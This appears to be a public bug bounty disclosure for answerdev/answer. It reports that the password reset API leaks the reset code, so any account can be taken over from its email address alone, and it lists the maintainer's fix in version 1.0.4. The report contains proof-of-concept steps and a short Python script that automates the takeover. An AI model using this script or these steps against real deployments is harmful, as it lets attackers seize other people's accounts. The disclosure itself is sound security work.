Account Takeover via reset password in answerdev/answer


Reported on

Jan 24th 2023


Password recovery leads to Account Take Over due to reset code leakage.

Proof of Concept

Create an acount in and verify mail,  then log out.

Go to password recovery (, insert your email and capture the server response, will be something like the following:

Copy the "data" token, then go to[CODE]

ATO :)


Compromise any account knowing only the email address


Attached this script so you don't have to use Burpsuite :)

from sys import argv
import urllib3
from requests import post


def ato(url: list, email: str) -> str:
        return f"Your Link: {''.join(url)}users/password-reset?code=" + \
               post(f"{''.join(url)}answer/api/v1/user/password/reset", json={"e_mail": email}, verify=False).json()["data"]
    except Exception as err:
        return f"Cant reach URL: {err}"

if __name__ == "__main__":
    if len(argv) != 3:
        print(f"Usage: {argv[0]} https://answer.domain/")

    print(ato([argv[1] if argv[1].endswith("/") else argv[1] + "/"], str(argv[2])))


Return code

Return code func definition

Response handler

We are processing your report and will contact the answerdev/answer team within 24 hours. a year ago
A GitHub Issue asking the maintainers to create a exists a year ago
Eduardo modified the report
a year ago
Eduardo modified the report
a year ago
We have contacted a member of the answerdev/answer team and are waiting to hear back a year ago
Eduardo modified the report
a year ago
answerdev/answer maintainer validated this vulnerability a year ago
blueudp has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
a year ago


Thank you very much for your validation, do you need anything else at the moment?

a year ago


Hello, How are you doing?

I have seen a commit where you have fixed the bug.

Could you please assign the commit with the report and assign CVE?

Thank you in advance, Best regards.

a year ago


@admin no response in this thread since report validation, could you start the CVE assignment process please?

a year ago


I have contacted an answerdev member privately, they want to keep the report private until the new release comes out. Is it possible to start the CVE assignment process without making the report public?

answerdev/answer maintainer marked this as fixed in 1.0.4 with commit c1fa2b a year ago
The fix bounty has been dropped
This vulnerability has now been published a year ago
to join this conversation